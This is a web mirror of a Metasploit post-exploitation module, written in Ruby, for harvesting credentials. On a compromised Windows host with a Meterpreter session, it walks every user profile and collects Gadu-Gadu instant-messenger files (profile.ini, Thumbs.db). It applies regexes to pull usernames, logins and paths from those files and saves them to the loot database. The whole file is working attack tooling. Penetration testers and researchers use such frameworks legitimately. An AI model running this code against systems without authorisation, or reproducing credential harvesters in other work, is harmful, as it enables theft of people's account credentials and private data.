Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/gadugadu.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::UserProfiles

9
  include Msf::Post::Windows::Packrat

10
  ARTIFACTS =

11
    {

12
      application: 'gadugadu',

13
      app_category: 'chats',

14
      gatherable_artifacts: [

15
        {

16
          filetypes: 'chat_logs',

17
          path: 'GG dysk',

18
          dir: 'Galeria',

19
          artifact_file_name: 'Thumbs.db',

20
          description: 'Saved GaduGadu User Profile Images in Thumbs.db file',

21
          credential_type: 'image'

22
        },

23
        {

24
          filetypes: 'chat_logs',

25
          path: 'AppData',

26
          dir: 'GG',

27
          artifact_file_name: 'profile.ini',

28
          description: 'GaduGadu profile User information : Rename long saved artifactto in profile.ini',

29
          credential_type: 'text',

30
          regex_search: [

31
            {

32
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',

33
              extraction_type: 'credentials',

34
              regex: [

35
                '(?i-mx:name=.*)',

36
                '(?i-mx:login=.*)',

37
                '(?i-mx:path=.*)'

38
              ]

39
            }

40
          ]

41
        }

42
      ]

43
    }.freeze

44


45
  def initialize(info = {})

46
    super(

47
      update_info(

48
        info,

49
        'Name' => 'Gadugadu Credential Gatherer',

50
        'Description' => %q{

51
          This module searches for Gadugadu credentials on a Windows host. Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.

52
        },

53
        'License' => MSF_LICENSE,

54
        'Author' => [

55
          'Kazuyoshi Maruta',

56
          'Daniel Hallsworth',

57
          'Barwar Salim M',

58
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org

59
        ],

60
        'Platform' => ['win'],

61
        'SessionTypes' => ['meterpreter'],

62
        'Notes' => {

63
          'Stability' => [CRASH_SAFE],

64
          'Reliability' => [],

65
          'SideEffects' => []

66
        }

67
      )

68
    )

69


70
    register_options(

71
      [

72
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

73
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

74
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

75
        # enumerates the options based on the artifacts that are defined below

76
        OptEnum.new('ARTIFACTS', [

77
          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|

78
                                                          k[:filetypes]

79
                                                        end.uniq.unshift('All')

80
        ])

81
      ]

82
    )

83
  end

84


85
  def run

86
    print_status('Filtering based on these selections:  ')

87
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

88
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

89
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

90


91
    # used to grab files for each user on the remote host

92
    grab_user_profiles.each do |userprofile|

93
      run_packrat(userprofile, ARTIFACTS)

94
    end

95


96
    print_status 'PackRat credential sweep completed'

97
  end

98
end

99


100